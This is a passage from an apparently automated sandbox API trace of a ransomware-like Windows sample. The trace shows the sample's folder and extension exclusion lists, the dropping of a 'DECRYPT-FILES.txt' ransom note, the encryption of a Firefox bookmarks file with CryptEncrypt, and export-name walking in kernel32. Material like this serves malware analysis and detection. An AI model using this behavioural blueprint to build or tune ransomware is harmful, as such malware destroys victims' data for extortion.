HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.624] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.624] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.624] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.624] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.624] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\All Users") returned 0x0 [0080.624] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.624] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.624] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.624] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="AhnLab") returned 0x0 [0080.624] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.624] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0080.624] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.624] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\\\jkbimi8.tmp") returned 116 [0080.624] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x460 [0080.657] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0080.657] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.657] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\\\DECRYPT-FILES.txt") returned 122 [0080.657] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0080.673] WriteFile (in: hFile=0x464, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0080.674] CloseHandle (hObject=0x464) returned 1 [0080.674] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0080.674] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*" [0080.674] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac47b080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac47b080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0080.674] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.674] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac47b080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac47b080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.674] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.674] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.674] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc37c9330, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xc37c9330, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc37df2c0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xbdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="bookmarks-2017-06-05_5.json", cAlternateFileName="BOOKMA~1.JSO")) returned 1 [0080.675] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="DECRYPT-FILES.txt") returned -1 [0080.675] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="autorun.inf") returned 1 [0080.675] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="boot.ini") returned -1 [0080.675] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="desktop.ini") returned -1 [0080.675] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="ntuser.dat") returned -1 [0080.675] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="iconcache.db") returned -1 [0080.675] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="bootsect.bak") returned -1 [0080.675] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="ntuser.dat.log") returned -1 [0080.675] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="thumbs.db") returned -1 [0080.675] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="Bootfont.bin") returned -1 [0080.675] lstrlenW (lpString="bookmarks-2017-06-05_5.json") returned 27 [0080.675] lstrcmpiW (lpString1="json", lpString2="lnk") returned -1 [0080.675] lstrcmpiW (lpString1="json", lpString2="exe") returned 1 [0080.675] lstrcmpiW (lpString1="json", lpString2="sys") returned -1 [0080.675] lstrcmpiW (lpString1="json", lpString2="dll") returned 1 [0080.675] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0080.675] lstrlenW (lpString="bookmarks-2017-06-05_5.json") returned 27 [0080.675] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0080.675] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpString2="bookmarks-2017-06-05_5.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" [0080.675] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.675] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0080.676] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x3f2d200 | out: lpFileSize=0x3f2d200*=3035) returned 1 [0080.676] CreateFileMappingW (hFile=0x468, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x46c [0080.676] MapViewOfFile (hFileMappingObject=0x46c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.699] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.699] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.699] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.699] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d168*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d168*=0x100) returned 1 [0080.699] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.700] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.700] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.700] CloseHandle (hObject=0x46c) returned 1 [0080.700] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.700] WriteFile (in: hFile=0x468, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d188, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d188*=0x108, lpOverlapped=0x0) returned 1 [0080.701] CloseHandle (hObject=0x0) returned 0 [0080.701] CloseHandle (hObject=0x468) returned 1 [0080.701] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.702] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.702] GetTickCount () returned 0x114ca90 [0080.702] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.702] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.702] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.702] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.703] lstrlenA (lpString="kernel32.dll") returned 12 [0080.703] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.703] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.703] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.703] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.703] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.703] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.703] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.703] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.703] lstrlenA (lpString="ADDATOMA") returned 8 [0080.703] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.703] lstrlenA (lpString="ADDATOMW") returned 8 [0080.703] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.703] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.703] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.703] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.703] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.703] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.703] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.703] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.703] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.703] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.703] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.703] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.703] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.703] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.703] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.703] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.704] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.704] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.704] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.704] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.704] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.704] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.704] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.704] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.704] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.704] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.704] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.704] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.704] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.704] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.704] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.704] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.704] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.704] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.704] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.705] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.705] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.705] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.705] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.705] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.705] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.705] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.705] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.705] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.705] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.705] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.705] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.705] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.705] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.705] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.705] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.705] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.705] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.705] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.706] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.706] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.706] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.706] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.706] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.706] lstrlenA (lpString="BEEP") returned 4 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.706] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.706] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.706] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.706] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" 